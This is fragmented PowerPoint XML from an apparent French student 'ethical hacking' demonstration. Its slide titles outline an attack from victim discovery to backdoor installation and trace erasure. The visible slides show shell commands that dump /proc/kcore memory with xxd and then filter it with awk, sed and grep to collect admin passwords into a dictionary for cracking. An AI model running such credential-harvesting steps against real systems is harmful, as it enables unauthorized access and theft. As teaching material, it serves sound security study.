              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Commande :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  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> RAM.bin &gt; RAM.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Outil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>xxd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>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> – Réalise un dump hexadécimal ou l’inverse. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Lucida Console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7879"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827584" y="4005064"/>
            <a:ext cx="755431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Etape 6 Epuration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7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45704"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Commande :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  <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> '{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $10}' RAM.txt &gt; RAM2.txt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41767"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1259631" y="2564903"/>
            <a:ext cx="7138126" cy="113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395536" y="3645024"/>
            <a:ext cx="8229600" cy="13457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Commande :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fr-FR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root</a:t>
            </a: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@</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR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debian</a:t>
            </a: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:/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR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tmp</a:t>
            </a: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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 's/\.//g' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RAM2.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RAM3.txt</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-F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6064"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1259632" y="4941168"/>
            <a:ext cx="3346326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7 Rechercher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>user:admin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4164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fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Commande :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --color -in admin RAM3.txt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Lucida Console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7056784" cy="157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467544" y="3573016"/>
            <a:ext cx="8229600" cy="7920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Commande :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root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debian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:/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tmp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#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grep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–c 10 --color -n admin RAM3.txt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t="12235" b="20666"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="4365103"/>
            <a:ext cx="6480720" cy="172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8 Tester les mots de passe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05744"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Attaque par dictionnaire :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exporter les mots de passe dans un dictionnaire :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -C 25 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" RAM3.txt &gt; dico.txt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869160"/>
            <a:ext cx="3632982" cy="142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611560" y="3933056"/>
            <a:ext cx="822960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Supprimer les lignes vides :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root@debian:/tmp# grep -v '^$' dico.txt &gt; dico2.txt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 b="20099"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627784" y="2852936"/>
            <a:ext cx="297839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818</TotalTime>
  <Words>840</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran (4:3)</PresentationFormat>
  <Paragraphs>169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Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Origine</vt:lpstr>
      <vt:lpstr>Démonstration</vt:lpstr>
      <vt:lpstr>Etape1 Trouver la victime</vt:lpstr>
      <vt:lpstr>Etape 2 Trouver la version de l’hardware </vt:lpstr>
      <vt:lpstr>Etape 3 Trouver les failles de la version</vt:lpstr>
      <vt:lpstr>Etape 4 Récupération de /proc/kcore</vt:lpstr>
      <vt:lpstr>Etape 5 Analyse du dump /proc/kcore</vt:lpstr>
      <vt:lpstr>Etape 6 Epuration</vt:lpstr>
      <vt:lpstr>Etape 7 Rechercher user:admin</vt:lpstr>
      <vt:lpstr>Etape 8 Tester les mots de passe</vt:lpstr>
      <vt:lpstr>Etape 9 Tester les mots de passe</vt:lpstr>
      <vt:lpstr>Etape 10 Mise en place d’une Backdoor</vt:lpstr>
      <vt:lpstr>Etape 10 Mise en place d’une Backdoor</vt:lpstr>
      <vt:lpstr>Etape 10 Mise en place d’une Backdoor</vt:lpstr>
      <vt:lpstr>Etape 10 Mise en place d’une Backdoor</vt:lpstr>
      <vt:lpstr>Etape 10 Mise en place d’une Backdoor</vt:lpstr>
      <vt:lpstr>Etape 10 Mise en place d’une Backdoor</vt:lpstr>
      <vt:lpstr>Etape 10 Mise en place d’une Backdoor</vt:lpstr>
      <vt:lpstr>Etape 11 Effacer ses traces</vt:lpstr>
      <vt:lpstr>Etape 11 Effacer ses traces</vt:lpstr>
      <vt:lpstr>Sources</vt:lpstr>
      <vt:lpstr>Tool Etical Hacking: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Démonstration</dc:title>
  <dc:creator>Windows-Work</dc:creator>
  <cp:lastModifiedBy>ETUDIANT</cp:lastModifiedBy>
  <cp:revision>79</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-12-03T17:35:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-12-05T08:41:59Z</dcterms:modified>
</cp:coreProperties>
</file>